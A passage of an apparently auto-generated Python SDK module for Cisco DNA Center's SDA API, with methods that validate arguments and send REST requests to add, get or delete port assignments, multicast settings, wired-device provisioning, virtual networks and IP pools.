headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e4a09bf566f35babad9e27f5eb61a86d_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e4a09bf566f35babad9e27f5eb61a86d_v2_2_2_3', json_data)
def delete_port_assignment_for_access_point(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Delete Port assignment for access point in SDA Fabric .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_bd26b08b64545bae20f60c56891576_v2_2_2_3', json_data)
def get_port_assignment_for_access_point(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Get Port assignment for access point in SDA Fabric .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b035b0b3b60b5f2bb7c8c82e7f94b63b_v2_2_2_3', json_data)
def delete_port_assignment_for_user_device(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Delete Port assignment for user device in SDA Fabric. .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb88b50dd5ead96ecfb4ab0390f47_v2_2_2_3', json_data)
def add_port_assignment_for_user_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Port assignment for user device in SDA Fabric. .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_af29516f0c8591da2a92523b5ab3386_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_af29516f0c8591da2a92523b5ab3386_v2_2_2_3', json_data)
def get_port_assignment_for_user_device(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Get Port assignment for user device in SDA Fabric. .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a446d7327733580e9a6b661715eb4c09_v2_2_2_3', json_data)
def add_multicast_in_sda_fabric(self,
fabricSiteNameHierarchy=None,
multicastMethod=None,
multicastVnInfo=None,
muticastType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add multicast in SDA fabric .
Args:
fabricSiteNameHierarchy(string): SDA's fabricSiteNameHierarchy .
multicastMethod(string): SDA's multicast methods . Available values are 'native_multicast' and ''.
multicastVnInfo(object): SDA's multicastVnInfo.
muticastType(string): SDA's muticast type . Available values are 'ssm', 'asm_with_external_rp' and ''.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'fabricSiteNameHierarchy':
fabricSiteNameHierarchy,
'multicastMethod':
multicastMethod,
'muticastType':
muticastType,
'multicastVnInfo':
multicastVnInfo,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_b7079a38844e56dd8f1b6b876880a02e_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b7079a38844e56dd8f1b6b876880a02e_v2_2_2_3', json_data)
def get_multicast_details_from_sda_fabric(self,
fabric_site_name_hierarchy,
headers=None,
**request_parameters):
"""Get multicast details from SDA fabric .
Args:
fabric_site_name_hierarchy(basestring): fabricSiteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricSiteNameHierarchy':
fabric_site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_c27bbb42365955bc210924e1362c34_v2_2_2_3', json_data)
def delete_multicast_from_sda_fabric(self,
fabric_site_name_hierarchy,
headers=None,
**request_parameters):
"""Delete multicast from SDA fabric .
Args:
fabric_site_name_hierarchy(basestring): fabricSiteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricSiteNameHierarchy':
fabric_site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e8e007d3e25f7fb83a6579016aea72_v2_2_2_3', json_data)
def delete_provisioned_wired_device(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Delete provisioned Wired Device .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter. Valid IP address of
the device currently provisioned in a fabric site .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e5bd8dbbf65253f0aadd77a62b1b8b58_v2_2_2_3', json_data)
def provision_wired_device(self,
deviceManagementIpAddress=None,
siteNameHierarchy=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Provision Wired Device .
Args:
deviceManagementIpAddress(string): SDA's Device Management Ip Address.
siteNameHierarchy(string): SDA's Site Name Hierarchy.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'deviceManagementIpAddress':
deviceManagementIpAddress,
'siteNameHierarchy':
siteNameHierarchy,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_d1608b2751c883a072ee3fb80228_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_d1608b2751c883a072ee3fb80228_v2_2_2_3', json_data)
def get_provisioned_wired_device(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Get Provisioned Wired Device .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d8f10868c21856eab31776f109aba2bb_v2_2_2_3', json_data)
def delete_vn(self,
site_name_hierarchy,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete virtual network (VN) from SDA Fabric .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb9f8ad5359b2b2cbc151ac3a842a_v2_2_2_3', json_data)
def get_vn(self,
site_name_hierarchy,
virtual_network_name,
headers=None,
**request_parameters):
"""Get virtual network (VN) from SDA Fabric .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb1fe08692b85767a42b84340c4c7d53_v2_2_2_3', json_data)
def add_vn(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add virtual network (VN) in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e3a724a35854758d65a83823c88435_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e3a724a35854758d65a83823c88435_v2_2_2_3', json_data)
def get_ip_pool_from_sda_virtual_network(self,
ip_pool_name,
virtual_network_name,
headers=None,
**request_parameters):
"""Get IP Pool from SDA Virtual Network .
Args:
ip_pool_name(basestring): ipPoolName query parameter.
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(ip_pool_name, basestring,
may_be_none=False)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'ipPoolName':
ip_pool_name,
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b88723912610599ba42292db52d1dae4_v2_2_2_3', json_data)
def delete_ip_pool_from_sda_virtual_network(self,
ip_pool_name,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete IP Pool from SDA Virtual Network .
Args:
ip_pool_name(basestring): ipPoolName query parameter.
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(ip_pool_name, basestring,
may_be_none=False)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'ipPoolName':
ip_pool_name,
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_c923d016d5401b7a9943724df3844_v2_2_2_3', json_data)
def add_ip_pool_in_sda_virtual_network(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add IP Pool in SDA Virtual Network .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_b07f187b7456c8bbb6088a2f24dcee_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b07f187b7456c8bbb6088a2f24dcee_v2_2_2_3', json_data)
def add_virtual_network_with_scalable_groups(self,
scalableGroupNames=None,
virtualNetworkName=None,
virtualNetworkType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add virtual network with scalable groups at global level .
Args:
scalableGroupNames(list): SDA's Scalable Group Names (list of strings).
virtualNetworkName(string): SDA's Virtual Network Name.
virtualNetworkType(string): SDA's Virtual Network Type.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'virtualNetworkName':
virtualNetworkName,
'virtualNetworkType':
virtualNetworkType,
'scalableGroupNames':
scalableGroupNames,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f5ebb9d50aab287f320d32181c0_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_f5ebb9d50aab287f320d32181c0_v2_2_2_3', json_data)
def delete_virtual_network_with_scalable_groups(self,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete virtual network with scalable groups .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_f2e8552eabc5e5f97e1f40bcc4b4c75_v2_2_2_3', json_data)
def get_virtual_network_with_scalable_groups(self,
virtual_network_name,
headers=None,
**request_parameters):
"""Get virtual network with scalable groups .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
